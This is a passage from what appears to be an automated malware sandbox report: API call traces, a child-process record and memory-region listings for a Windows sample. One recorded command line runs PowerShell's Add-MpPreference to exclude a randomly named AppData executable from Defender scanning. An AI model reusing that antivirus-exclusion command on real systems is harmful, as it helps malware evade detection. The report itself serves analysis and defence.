[71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x41e792, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0157.047] ResumeThread (hThread=0x360) returned 0x1
[0157.272] CoGetContextToken (in: pToken=0x17e620 | out: pToken=0x17e620) returned 0x0
[0157.272] CObjectContext::QueryInterface () returned 0x0
[0157.272] CObjectContext::GetCurrentThreadType () returned 0x0
[0157.272] Release () returned 0x0
[0157.274] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0x13880, cHandles=0x1, pHandles=0x634180*=0xac, lpdwindex=0x17e4cc | out: lpdwindex=0x17e4cc) returned 0x0
Thread:
id = 2
os_tid = 0xf68
Thread:
id = 3
os_tid = 0xf6c
[0062.535] CoGetContextToken (in: pToken=0xc5f99c | out: pToken=0xc5f99c) returned 0x800401f0
[0062.535] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
[0157.353] SetWindowLongW (hWnd=0x70044, nIndex=-4, dwNewLong=1995646429) returned 18680062
[0157.355] SetClassLongW (hWnd=0x70044, nIndex=-24, dwNewLong=1995646429) returned 0x11d08d6
[0157.356] PostMessageW (hWnd=0x70044, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0157.357] GetModuleHandleW (lpModuleName=0x0) returned 0x1370000
[0157.358] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.141b42a_r14_ad1", hInstance=0x1370000) returned 0
[0157.362] IsWindow (hWnd=0x70060) returned 1
[0157.364] GetModuleHandleW (lpModuleName="user32.dll") returned 0x76860000
[0157.364] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0xc5f71c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW³oHè·\x90Dþwq\x9cùÅ", lpUsedDefaultChar=0x0) returned 14
[0157.364] GetProcAddress (hModule=0x76860000, lpProcName="DefWindowProcW") returned 0x76f325dd
[0157.365] SetWindowLongW (hWnd=0x70060, nIndex=-4, dwNewLong=1995646429) returned 18680142
[0157.365] SetClassLongW (hWnd=0x70060, nIndex=-24, dwNewLong=1995646429) returned 0x11d094e
[0157.365] IsWindow (hWnd=0x70060) returned 1
[0157.366] DestroyWindow (hWnd=0x70060) returned 0
[0157.366] PostMessageW (hWnd=0x70060, Msg=0x10, wParam=0x0, lParam=0x0) returned 1
[0157.366] SetConsoleCtrlHandler (HandlerRoutine=0x11d0926, Add=0) returned 1
[0157.367] EtwEventUnregister () returned 0x0
[0157.399] DeleteObject (ho=0x190a0b41) returned 1
[0157.400] DeleteObject (ho=0x110a01d2) returned 1
[0157.401] GdipDeleteFont (font=0x74e0e68) returned 0x0
[0157.402] GdipDeleteFont (font=0x74e0eb8) returned 0x0
[0157.404] GetCurrentObject (hdc=0x14010b69, type=0x6) returned 0xb0a0b67
[0157.404] SelectObject (hdc=0x14010b69, h=0x18a002e) returned 0xb0a0b67
[0157.405] DeleteObject (ho=0xb0a0b67) returned 1
[0157.406] DeleteDC (hdc=0x14010b69) returned 1
[0157.409] RestoreDC (hdc=0x0, nSavedDC=-1) returned 0
[0157.411] GdipDeleteFont (font=0x74e0e90) returned 0x0
[0157.414] CloseHandle (hObject=0x40) returned 1
[0157.432] GdipDisposeImage (image=0x7414d48) returned 0x0
[0157.448] CloseHandle (hObject=0x2a8) returned 1
[0157.448] CloseHandle (hObject=0x29c) returned 1
[0157.449] CloseHandle (hObject=0x3b0) returned 1
[0157.451] RegCloseKey (hKey=0x80000004) returned 0x0
[0157.453] CloseHandle (hObject=0x36c) returned 1
Thread:
id = 4
os_tid = 0xf70
Thread:
id = 5
os_tid = 0xf7c
Thread:
id = 6
os_tid = 0xf80
Thread:
id = 7
os_tid = 0xfa0
Thread:
id = 8
os_tid = 0xfa4
Thread:
id = 9
os_tid = 0xfc0
Thread:
id = 12
os_tid = 0xffc
Thread:
id = 18
os_tid = 0x858
Process:
id = "2"
image_name = "powershell.exe"
filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe"
page_root = "0x3d746000"
os_pid = "0xfc8"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "1"
os_parent_pid = "0xf60"
cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" Add-MpPreference -ExclusionPath \"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\""
cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 1455
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 1456
start_va = 0x30000
end_va = 0x31fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000030000"
filename = ""
Region:
id = 1457
start_va = 0x40000
end_va = 0x40fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 1458
start_va = 0x50000
end_va = 0x53fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000050000"
filename = ""
Region:
id = 1459
start_va = 0x60000
end_va = 0x60fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000060000"
filename = ""
Region:
id = 1460
start_va = 0xa0000
end_va = 0xdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000a0000"
filename = ""
Region:
id = 1461
start_va = 0x210000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000210000"
filename = ""
Region:
id = 1462
start_va = 0x10f0000
end_va = 0x115afff
monitored = 0
entry_point = 0x10fd330
region_type = mapped_file
name = "powershell.exe"
filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe")
Region:
id = 1463
start_va = 0x76d20000
end_va = 0x76ec8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1464
start_va = 0x76f00000
end_va = 0x7707ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")
Region:
id = 1465
start_va = 0x7efb0000
end_va = 0x7efd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efb0000"
filename = ""
Region:
id = 1466
start_va = 0x7efdb000
end_va = 0x7efddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdb000"
filename = ""
Region:
id = 1467
start_va = 0x7efde000
end_va = 0x7efdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efde000"
filename = ""
Region:
id = 1468
start_va = 0x7efdf000
end_va = 0x7efdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efdf000"
filename = ""
Region:
id = 1469
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 1470
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1471
start_va = 0x7fff0000
end_va = 0x7fffffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007fff0000"
filename = ""
Region:
id = 1472
start_va = 0xe0000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000e0000"
filename = ""
Region:
id = 1473
start_va = 0x73690000
end_va = 0x736cefff
monitored = 0
entry_point = 0x736be088
region_type = mapped_file
name = "wow64.dll"
filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")
Region:
id = 1474
start_va = 0x73630000
end_va = 0x7368bfff
monitored = 0
entry_point = 0x7366f9f4
region_type = mapped_file
name = "wow64win.dll"
filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")
Region:
id = 1475
start_va = 0x73620000
end_va = 0x73627fff
monitored = 0
entry_point = 0x736220f8
region_type = mapped_file
name = "wow64cpu.dll"
filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")
Region:
id = 1476
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1477
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1478
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 0
entry_point = 0x76b15340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1479
start_va = 0x76b00000
end_va = 0x76c1efff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076b00000"
filename = ""
Region:
id = 1480
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 0
entry_point = 0x76c3a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1481
start_va = 0x76c20000
end_va = 0x76d19fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000076c20000"
filename = ""
Region:
id = 1482
start_va = 0x250000
end_va = 0x3cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000250000"
filename = ""
Region:
id = 1483
start_va = 0x752b0000
end_va = 0x753bffff
monitored = 0
entry_point = 0x752c3283
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")
Region:
id = 1484
start_va = 0x753c0000
end_va = 0x75406fff
monitored = 0
entry_point = 0x753c74c1
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")
Region:
id = 1485
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 1486
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1487
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1522
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1523
start_va = 0xe0000
end_va = 0x146fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1524
start_va = 0x160000
end_va = 0x1dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 1525
start_va = 0x76a60000
end_va = 0x76afffff
monitored = 0
entry_point = 0x76a749e5
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")
Region:
id = 1526
start_va = 0x75410000
end_va = 0x754bbfff
monitored = 0
entry_point = 0x7541a472
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")
Region:
id = 1527
start_va = 0x759a0000
end_va = 0x759b8fff
monitored = 0
entry_point = 0x759a4975
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")
Region:
id = 1528
start_va = 0x76970000
end_va = 0x76a5ffff
monitored = 0
entry_point = 0x76980569
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")
Region:
id = 1529
start_va = 0x74a50000
end_va = 0x74aaffff
monitored = 0
entry_point = 0x74a6a3b3
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")
Region:
id = 1530
start_va = 0x74a40000
end_va = 0x74a4bfff
monitored = 0
entry_point = 0x74a410e1
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")
Region:
id = 1531
start_va = 0x74930000
end_va = 0x74943fff
monitored = 0
entry_point = 0x74931da9
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")
Region:
id = 1558
start_va = 0x76860000
end_va = 0x7695ffff
monitored = 0
entry_point = 0x7687b6ed
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")
Region:
id = 1559
start_va = 0x75220000
end_va = 0x752affff
monitored = 0
entry_point = 0x75236343
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")
Region:
id = 1560
start_va = 0x759c0000
end_va = 0x759c9fff
monitored = 0
entry_point = 0x759c36a0
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll")
Region:
id = 1561
start_va = 0x74d40000
end_va = 0x74ddcfff
monitored = 0
entry_point = 0x74d73fd7
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll")
Region:
id = 1562
start_va = 0x75740000
end_va = 0x7589bfff
monitored = 0
entry_point = 0x7578ba3d
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")
Region:
id = 1563
start_va = 0x75130000
end_va = 0x751befff
monitored = 0
entry_point = 0x75133fb1
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")
Region:
id = 1564
start_va = 0x73500000
end_va = 0x73549fff
monitored = 1
entry_point = 0x73502e54
region_type = mapped_file
name = "mscoree.dll"
filename = "\\Windows\\SysWOW64\\mscoree.dll" (normalized: "c:\\windows\\syswow64\\mscoree.dll")
Region:
id = 1569
start_va = 0x3d0000
end_va = 0x54ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1570
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1571
start_va = 0x550000
end_va = 0x6d7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1572
start_va = 0x70000
end_va = 0x8dfff
monitored = 0
entry_point = 0x8158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1575
start_va = 0x75550000
end_va = 0x755affff
monitored = 0
entry_point = 0x7556158f
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")
Region:
id = 1576
start_va = 0x74c40000
end_va = 0x74d0bfff
monitored = 0
entry_point = 0x74c4168b
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll")
Region:
id = 1578
start_va = 0x6e0000
end_va = 0x860fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006e0000"
filename = ""
Region:
id = 1579
start_va = 0x1160000
end_va = 0x255ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001160000"
filename = ""
Region:
id = 1588
start_va = 0x30000
end_va = 0x32fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "powershell.exe.mui"
filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui")
Region:
id = 1589
start_va = 0x70000
end_va = 0x70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 1590
start_va = 0x80000
end_va = 0x80fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 1591
start_va = 0x3d0000
end_va = 0x47ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003d0000"
filename = ""
Region:
id = 1592
start_va = 0x540000
end_va = 0x54ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000540000"
filename = ""
Region:
id = 1593
start_va = 0x870000
end_va = 0xa5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000870000"
filename = ""
Region:
id = 1594
start_va = 0x733b0000
end_va = 0x7343cfff
monitored = 1
entry_point = 0x733c2860
region_type = mapped_file
name = "mscoreei.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll")
Region:
id = 1595
start_va = 0x734f0000
end_va = 0x734f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "api-ms-win-core-synch-l1-2-0.dll"
filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll")
Region:
id = 1596
start_va = 0x751c0000
end_va = 0x75216fff
monitored = 0
entry_point = 0x751d9ba6
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")
Region:
id = 1597
start_va = 0x733a0000
end_va = 0x733a8fff
monitored = 0
entry_point = 0x733a1220
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll")
Region:
id = 1598
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 1599
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 1600
start_va = 0x71770000
end_va = 0x71f1efff
monitored = 1
entry_point = 0x7178d0d0
region_type = mapped_file
name = "clr.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")
Region:
id = 1601
start_va = 0x73600000
end_va = 0x73613fff
monitored = 0
entry_point = 0x7360ac00
region_type = mapped_file
name = "vcruntime140_clr0400.dll"
